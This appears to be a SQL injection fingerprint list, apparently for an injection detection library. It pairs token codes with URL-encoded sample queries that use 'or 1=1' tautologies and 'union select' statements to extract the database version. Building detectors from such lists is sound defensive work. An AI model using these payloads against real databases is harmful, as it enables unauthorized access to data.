s.UE1%3A+select+%2A+from+users+where+id%3D1+or+1%23%22.+union+select+1%2Cversion%28%29+--+1
s.UEf%3A+select+%2A+from+users+where+id%3D1+or+1%23%22.+union+select+version%28%29%2Cversion%28%29+--+1
s.UEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22.+union+select+%27a%27%2Cversion%28%29+--+1
s.UEv%3A+select+%2A+from+users+where+id%3D1+or+1%23%22.+union+select+null%2Cversion%28%29+--+1
s.c%3A+select+%2A+from+users+where+id%3D1+or+%22.%23%22+or+1%3D1+--+1
s.n%3A+select+%2A+from+users+where+id%3D1+or+%22.%5B%22+or+1%3D1+--+1
s.ns%3A+select+%2A+from+users+where+id%3D1+or+%22._%22+or+1%3D1+--+1
s.o1%26%3A+select+%2A+from+users+where+id%3D1+or+%40%23%22.%3D1+or+1%3D1+--+1
s.o1U%3A+select+%2A+from+users+where+id%3D1+or+1%23%22.%3D1+union+select+1%2Cversion%28%29+--+1
s.os%3A+select+%2A+from+users+where+id%3D1+or+%22.%25%22+or+1%3D1+--+1
s.v%3A+select+%2A+from+users+where+id%3D1+or+%22.%40%22+or+1%3D1+--+1
s.%7Bs%3A+select+%2A+from+users+where+id%3D1+or+%22.%7B%22+or+1%3D1+--+1
s1%28s%3A+select+%2A+from+users+where+id%3D1+or+%221%28%22%3D1+or+1%3D1+--+1
s1%29s%3A+select+%2A+from+users+where+id%3D1+or+%221%29%22+or+1%3D1+--+1
s1%3A+select+%2A+from+users+where+id%3D1+or+%221%2C%22+or+1%3D1+--+1
s1%3As%3A+select+%2A+from+users+where+id%3D1+or+%221%3A%22+or+1%3D1+--+1
s1%3Bs%3A+select+%2A+from+users+where+id%3D1+or+%221%3B%22%3D1+or+1%3D1+--+1
s1%3Fs%3A+select+%2A+from+users+where+id%3D1+or+%221%5D%22+or+1%3D1+--+1
s1UE1%3A+select+%2A+from+users+where+id%3D1+or+1%23%221+union+select+1%2Cversion%28%29+--+1
s1UEf%3A+select+%2A+from+users+where+id%3D1+or+1%23%221+union+select+version%28%29%2Cversion%28%29+--+1
s1UEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%221+union+select+%27a%27%2Cversion%28%29+--+1
s1UEv%3A+select+%2A+from+users+where+id%3D1+or+1%23%221+union+select+null%2Cversion%28%29+--+1
s1c%3A+select+%2A+from+users+where+id%3D1+or+%221%23%22+or+1%3D1+--+1
s1n%3A+select+%2A+from+users+where+id%3D1+or+%221%5B%22+or+1%3D1+--+1
s1ns%3A+select+%2A+from+users+where+id%3D1+or+%221_%22+or+1%3D1+--+1
s1os%3A+select+%2A+from+users+where+id%3D1+or+%221%26%22+or+1%3D1+--+1
s1%7Bs%3A+select+%2A+from+users+where+id%3D1+or+%221%7B%22+or+1%3D1+--+1
s%3A+select+%2A+from+users+where+id%3D%271%27+or+%22%22%3C%40+union+select+1%2Cversion%28%29+--+1%27
s%3A%261c%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3A+or+1%3D1+--+1
s%3A%28s%3A+select+%2A+from+users+where+id%3D1+or+%22%3A%28%22%3D1+or+1%3D1+--+1
s%3A%29s%3A+select+%2A+from+users+where+id%3D1+or+%22%3A%29%22%3D1+or+1%3D1+--+1
s%3A%2Cs%3A+select+%2A+from+users+where+id%3D1+or+%22%3A%2C%22+or+1%3D1+--+1
s%3A.s%3A+select+%2A+from+users+where+id%3D1+or+%22%3A.%22%3D1+or+1%3D1+--+1
s%3A1s%3A+select+%2A+from+users+where+id%3D1+or+%22%3A1%22+or+1%3D1+--+1
s%3A%3Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%3A%3B%22%3D1+or+1%3D1+--+1
s%3A%3Fs%3A+select+%2A+from+users+where+id%3D1+or+%22%3A%5D%22+or+1%3D1+--+1
s%3AUE1%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3A+union+select+1%2Cversion%28%29+--+1
s%3AUEf%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3A+union+select+version%28%29%2Cversion%28%29+--+1
s%3AUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3A+union+select+%27a%27%2Cversion%28%29+--+1
s%3AUEv%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3A+union+select+null%2Cversion%28%29+--+1
s%3Ac%3A+select+%2A+from+users+where+id%3D1+or+%22%3A%23%22+or+1%3D1+--+1
s%3An%3A+select+%2A+from+users+where+id%3D1+or+%22%3A%5B%22+or+1%3D1+--+1
s%3Ans%3A+select+%2A+from+users+where+id%3D1+or+%22%3A%24%22+or+1%3D1+--+1
s%3Aos%3A+select+%2A+from+users+where+id%3D1+or+%22%3A%25%22+or+1%3D1+--+1
s%3As%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%22%3A%22_%2Cversion%28%29+--+1%27
s%3Av%3A+select+%2A+from+users+where+id%3D1+or+%22%3A%40%22+or+1%3D1+--+1
s%3A%7Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%3A%7B%22+or+1%3D1+--+1
s%3B%261c%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3B+or+1%3D1+--+1
s%3B%28s%3A+select+%2A+from+users+where+id%3D1+or+%22%3B%28%22+or+1%3D1+--+1
s%3B%29s%3A+select+%2A+from+users+where+id%3D1+or+%22%3B%29%22%3D1+or+1%3D1+--+1
s%3B%2Cs%3A+select+%2A+from+users+where+id%3D1+or+%22%3B%2C%22%3D1+or+1%3D1+--+1
s%3B.s%3A+select+%2A+from+users+where+id%3D1+or+%22%3B.%22%3D1+or+1%3D1+--+1
s%3B1s%3A+select+%2A+from+users+where+id%3D1+or+%22%3B1%22+or+1%3D1+--+1
s%3B%3As%3A+select+%2A+from+users+where+id%3D1+or+%22%3B%3A%22%3D1+or+1%3D1+--+1
s%3B%3Fs%3A+select+%2A+from+users+where+id%3D1+or+%22%3B%5D%22+or+1%3D1+--+1
s%3BUE1%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3B+union+select+1%2Cversion%28%29+--+1
s%3BUEf%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3B+union+select+version%28%29%2Cversion%28%29+--+1
s%3BUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3B+union+select+%27a%27%2Cversion%28%29+--+1
s%3BUEv%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3B+union+select+null%2Cversion%28%29+--+1
s%3Bc%3A+select+%2A+from+users+where+id%3D1+or+%22%3B%23%22+or+1%3D1+--+1
s%3Bn%3A+select+%2A+from+users+where+id%3D1+or+%22%3B%5B%22+or+1%3D1+--+1
s%3Bns%3A+select+%2A+from+users+where+id%3D1+or+%22%3B_%22+or+1%3D1+--+1
s%3Bo1%26%3A+select+%2A+from+users+where+id%3D1+or+%40%23%22%3B%3D1+or+1%3D1+--+1
s%3Bo1U%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3B%3D1+union+select+1%2Cversion%28%29+--+1
s%3Bos%3A+select+%2A+from+users+where+id%3D1+or+%22%3B%26%22+or+1%3D1+--+1
s%3Bs%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%22%3B%22_%2Cversion%28%29+--+1%27
s%3Bv%3A+select+%2A+from+users+where+id%3D1+or+%22%3B%40%22+or+1%3D1+--+1
s%3B%7Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%3B%7B%22+or+1%3D1+--+1
s%3F%261c%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3F+or+1%3D1+--+1
s%3F%28s%3A+select+%2A+from+users+where+id%3D1+or+%22%3F%28%22+or+1%3D1+--+1
s%3F%29s%3A+select+%2A+from+users+where+id%3D1+or+%22%5D%29%22+or+1%3D1+--+1
s%3F%2Cs%3A+select+%2A+from+users+where+id%3D1+or+%22%3F%2C%22+or+1%3D1+--+1
s%3F%2Cvc%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%24%5B%22%5D%2C%40%40VERSION+--+1%27
s%3F.s%3A+select+%2A+from+users+where+id%3D1+or+%22%5D.%22+or+1%3D1+--+1
s%3F1s%3A+select+%2A+from+users+where+id%3D1+or+%22%5D1%22+or+1%3D1+--+1
s%3F%3As%3A+select+%2A+from+users+where+id%3D1+or+%22%5D%3A%22+or+1%3D1+--+1
s%3F%3Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%3F%3B%22+or+1%3D1+--+1
s%3F%3Fs%3A+select+%2A+from+users+where+id%3D1+or+%22%3F%3F%22+or+1%3D1+--+1
s%3FUE1%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3F+union+select+1%2Cversion%28%29+--+1
s%3FUEf%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3F+union+select+version%28%29%2Cversion%28%29+--+1
s%3FUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3F+union+select+%27a%27%2Cversion%28%29+--+1
s%3FUEv%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3F+union+select+null%2Cversion%28%29+--+1
s%3Fc%3A+select+%2A+from+users+where+id%3D1+or+%22%3F%23%22+or+1%3D1+--+1
s%3Fn%3A+select+%2A+from+users+where+id%3D1+or+%22%3F%5B%22+or+1%3D1+--+1
s%3Fns%3A+select+%2A+from+users+where+id%3D1+or+%22%3F_%22+or+1%3D1+--+1
s%3Fo1%26%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3F%3D1+or+1%3D1+--+1
s%3Fo1U%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3F%3D1+union+select+1%2Cversion%28%29+--+1
s%3Fos%3A+select+%2A+from+users+where+id%3D1+or+%22%3F%25%22+or+1%3D1+--+1
s%3Fs%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%22%3F%22_%2Cversion%28%29+--+1%27
s%3Fv%3A+select+%2A+from+users+where+id%3D1+or+%22%3F%40%22+or+1%3D1+--+1
s%3F%7Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%5D%7B%22+or+1%3D1+--+1
sUE%26o%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%7C%7C%2F1%2Cversion%28%29+--+1%27
sUE%28%29%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%28%5C%29%2C%40%40VERSION+--+1%27
sUE%28.%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%28%5C.%29%2C%40%40VERSION+--+1%27
sUE%281%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%281%29%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27
sUE%2Cv%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%5C%2C%40%40VERSION+--+1%27
sUE.%2C%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%5C.%2C%40%40VERSION+--+1%27
sUE.c%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%5C.%23%2C%40%40VERSION+--+1%27
sUE.o%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%5C.%251%2C%40%40VERSION+--+1%27
sUE1k%3A+select+%2A+from+users+where+id%3D%271%27+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27
sUE1n%3A+select+%2A+from+users+where+id%3D%271%27+union+select+1a%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27
sUE1s%3A+select+%2A+from+users+where+id%3D%271%27+union+select+1%22%21%22%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27
sUE%5Cc%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%5C%23%2C%40%40VERSION+--+1%27
sUEn.%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%24+.%2C%40%40VERSION+--+1%27
sUEnn%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%24+_%2C%40%40VERSION+--+1%27
sUEnv%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%24%2A%24%2C%40%40VERSION+--+1%27
sUEo%2C%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%2B%5C%2C%40%40VERSION+--+1%27
sUEo.%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%2B%5C.%2C%40%40VERSION+--+1%27
sUEo1%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%21%3C1%2Cversion%28%29+--+1%27
sUEo%5C%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%2B%5C%23%2C%40%40VERSION+--+1%27
sUEov%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%21%3C%40%2Cversion%28%29+--+1%27
sUEv1%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%40+1%2Cversion%28%29+--++1%27
sUEvk%3A+select+%2A+from+users+where+id%3D%271%27+++union+select+null%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27
sUEvv%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%40+%401%2Cversion%28%29+--++1%27
s%5Cc%3A+select+%2A+from+users+where+id%3D1+or+%22%5C%23%22+or+1%3D1+--+1
sn%28s%3A+select+%2A+from+users+where+id%3D1+or+%22%24%28%22+or+1%3D1+--+1
sn%29s%3A+select+%2A+from+users+where+id%3D1+or+%22_%29%22+or+1%3D1+--+1
sn%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%22%5B%22_%2Cversion%28%29+--+1%27
sn%3As%3A+select+%2A+from+users+where+id%3D1+or+%22%24%3A%22+or+1%3D1+--+1
sn%3Bs%3A+select+%2A+from+users+where+id%3D1+or+%22_%3B%22+or+1%3D1+--+1
sn%3Fs%3A+select+%2A+from+users+where+id%3D1+or+%22%24%3F%22+or+1%3D1+--+1
snUE1%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%24+union+select+1%2Cversion%28%29+--+1
snUEf%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%24+union+select+version%28%29%2Cversion%28%29+--+1
snUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%24+union+select+%27a%27%2Cversion%28%29+--+1
snUEv%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%24+union+select+null%2Cversion%28%29+--+1
snc%3A+select+%2A+from+users+where+id%3D1+or+%22%24%23%22+or+1%3D1+--+1
snn%3A+select+%2A+from+users+where+id%3D1+or+%22%24%5B%22+or+1%3D1+--+1
snns%3A+select+%2A+from+users+where+id%3D1+or+%22%24_%22+or+1%3D1+--+1
snos%3A+select+%2A+from+users+where+id%3D1+or+%22%24%26%22+or+1%3D1+--+1
snv%3A+select+%2A+from+users+where+id%3D1+or+%22%24%40%22+or+1%3D1+--+1
sn%7Bs%3A+select+%2A+from+users+where+id%3D1+or+%22_%7B%22+or+1%3D1+--+1
so%28%29%26%3A+select+%2A+from+users+where+id%3D%271%27+%2A%28%5C%29+or+1%3D1+--+1%27
so%28%29U%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%28%5C%29+union+select+1%2C%40%40VERSION+--+1%27
so%28.%29%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%28%5C.%29+union+select+1%2C%40%40VERSION+--+1%27
so%281%29%3A+select+%2A+from+users+where+id%3D%271%27+%2A%281%29+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27
so%28s%3A+select+%2A+from+users+where+id%3D1+or+%22%26%28%22+or+1%3D1+--+1
so%29s%3A+select+%2A+from+users+where+id%3D1+or+%22%26%29%22+or+1%3D1+--+1
so%2Cs%3A+select+%2A+from+users+where+id%3D1+or+%22%25%2C%22+or+1%3D1+--+1
so..%26%3A+select+%2A+from+users+where+id%3D%271%27%3C%40..+or+1%3D1+--+1%27
so..U%3A+select+%2A+from+users+where+id%3D%271%27%3C%40..+union+select+1%2Cversion%28%29+--+1%27
so.n%26%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40.%24+or+1%3D1+--+1%27
so.nU%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40._+union+select+1%2Cversion%28%29+--+1%27
so.s%3A+select+%2A+from+users+where+id%3D1+or+%22%25.%22+or+1%3D1+--+1
so1%261%3A+select+%2A+from+users+where+id%3D%271%27+%2B+1%7C%7C1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27
so1UE%3A+select+%2A+from+users+where+id%3D%271%27+%2A1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27
so1s%3A+select+%2A+from+users+where+id%3D1+or+%22%251%22+or+1%3D1+--+1
so%3As%3A+select+%2A+from+users+where+id%3D1+or+%22%26%3A%22+or+1%3D1+--+1
so%3Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%25%3B%22+or+1%3D1+--+1
so%3Fs%3A+select+%2A+from+users+where+id%3D1+or+%22%25%3F%22+or+1%3D1+--+1
soc%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%40%3C%40%23+union+select+1%2Cversion%28%29+--+1%27
son.%26%3A+select+%2A+from+users+where+id%3D%271%27+%2A%24+.+or+1%3D1+--+1%27
son.U%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%24+.+union+select+1%2C%40%40VERSION+--+1%27
son1%26%3A+select+%2A+from+users+where+id%3D%271%27+%2A%24+1+or+1%3D1+--+1%27
son%3A+select+%2A+from+users+where+id%3D1+or+%22%25%5B%22+or+1%3D1+--+1
sonn%26%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40%24_+or+1%3D1+--+1%27
sonnU%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40%24_+union+select+1%2Cversion%28%29+--+1%27
sons%3A+select+%2A+from+users+where+id%3D1+or+%22%25_%22+or+1%3D1+--+1
soo%261%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%24%2B%25%5C+or+1%3D1+--+1%27
soo1%26%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40%261+or+1%3D1+--+1%27
soo1U%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40%261+union+select+1%2Cversion%28%29+--+1%27
sooUE%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40%3C%40+union+select+1%2Cversion%28%29+--+1%27
soon%26%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%24%2B%25%24+or+1%3D1+--+1%27
soonU%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%24%2B%2A%24+union+select+1%2C%40%40VERSION+--+1%27
soos%3A+select+%2A+from+users+where+id%3D1+or+%22%25%26%22+or+1%3D1+--+1
soov%26%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40%26%40+or+1%3D1+--+1%27
soovU%3A+select+%2A+from+users+where+id%3D%271%27+%25%21%3C%40+union+select+1%2Cversion%28%29+--+1%27
sos%3A+select+%2A+from+users+where+id%3D%271%27%3C%40%24%24+union+select+1%2Cversion%28%29+--+1%27
sov%281%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%40%281%29+union+select+1%2Cversion%28%29+--+1%27
sov1U%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%40+1+union+select+1%2Cversion%28%29+--+1%27
sov1o%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%40+1%21+union+select+1%2Cversion%28%29+--+1%27
sovvU%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%40+%401+union+select+1%2Cversion%28%29+--+1%27
so%7Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%25%7B%22+or+1%3D1+--+1
sv%28s%3A+select+%2A+from+users+where+id%3D1+or+%22%40%28%22+or+1%3D1+--+1
sv%29s%3A+select+%2A+from+users+where+id%3D1+or+%22%40%29%22+or+1%3D1+--+1
sv%3As%3A+select+%2A+from+users+where+id%3D1+or+%22%40%3A%22%3D1+or+1%3D1+--+1
sv%3Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%40%3B%22%3D1+or+1%3D1+--+1
sv%3Fs%3A+select+%2A+from+users+where+id%3D1+or+%22%40%3F%22+or+1%3D1+--+1
svUE1%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%40+union+select+1%2Cversion%28%29+--+1
svUEf%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%40+union+select+version%28%29%2Cversion%28%29+--+1
svUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%40+union+select+%27a%27%2Cversion%28%29+--+1
svUEv%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%40+union+select+null%2Cversion%28%29+--+1
svc%3A+select+%2A+from+users+where+id%3D1+or+%22%40%23%22+or+1%3D1+--+1
svos%3A+select+%2A+from+users+where+id%3D1+or+%22%40%25%22+or+1%3D1+--+1
s%7B%28s%3A+select+%2A+from+users+where+id%3D1+or+%22%7B%28%22%3D1+or+1%3D1+--+1
s%7B%29s%3A+select+%2A+from+users+where+id%3D1+or+%22%7B%29%22+or+1%3D1+--+1
s%7B%2Cs%3A+select+%2A+from+users+where+id%3D1+or+%22%7B%2C%22%3D1+or+1%3D1+--+1
s%7B.s%3A+select+%2A+from+users+where+id%3D1+or+%22%7B.%22+or+1%3D1+--+1
s%7B1s%3A+select+%2A+from+users+where+id%3D1+or+%22%7B1%22%3D1+or+1%3D1+--+1
s%7B%3As%3A+select+%2A+from+users+where+id%3D1+or+%22%7B%3A%22+or+1%3D1+--+1
s%7B%3Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%7B%3B%22+or+1%3D1+--+1
s%7B%3Fs%3A+select+%2A+from+users+where+id%3D1+or+%22%7B%3F%22+or+1%3D1+--+1
s%7BUE1%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%7B+union+select+1%2Cversion%28%29+--+1
s%7BUEf%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%7B+union+select+version%28%29%2Cversion%28%29+--+1
s%7BUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%7B+union+select+%27a%27%2Cversion%28%29+--+1
s%7BUEv%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%7B+union+select+null%2Cversion%28%29+--+1
s%7Bc%3A+select+%2A+from+users+where+id%3D1+or+%22%7B%23%22+or+1%3D1+--+1
s%7Bo1%26%3A+select+%2A+from+users+where+id%3D1+or+%40%23%22%7B%3D1+or+1%3D1+--+1
s%7Bo1U%3A+select+%2A+from+users+where+id%3D1+or+%40%23%22%7B%3D1+union+select+1%2Cversion%28%29+--+1
s%7Bos%3A+select+%2A+from+users+where+id%3D1+or+%22%7B%25%22+or+1%3D1+--+1
s%7Bv%3A+select+%2A+from+users+where+id%3D1+or+%22%7B%40%22+or+1%3D1+--+1
s%7B%7Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%7B%7B%22+or+1%3D1+--+1
v%3A+select+%2A+from+users+where+id%3D1+%2B+%40%60%5C%60+union+select+1%2Cversion%28%29+--+1
vc%3A+select+%2A+from+users+where+id%3D1+%2B+%40%3C1%23+union+select+1%2Cversion%28%29+--+1
vo.UE%3A+select+%2A+from+users+where+id%3D1+%2B+%40%3C%40.+union+select+1%2Cversion%28%29+--+1
voUE1%3A+select+%2A+from+users+where+id%3D1+-%40%3C%40+union+select+1%2Cversion%28%29+--+1
voUEf%3A+select+%2A+from+users+where+id%3D1+-%40%3C%40+union+select+version%28%29%2Cversion%28%29+--+1
voUEv%3A+select+%2A+from+users+where+id%3D1+-%40%3C%40+union+select+null%2Cversion%28%29+--+1
voc%3A+select+%2A+from+users+where+id%3D1+%2B+%40%3C%40%23+union+select+null%2Cversion%28%29+--+1
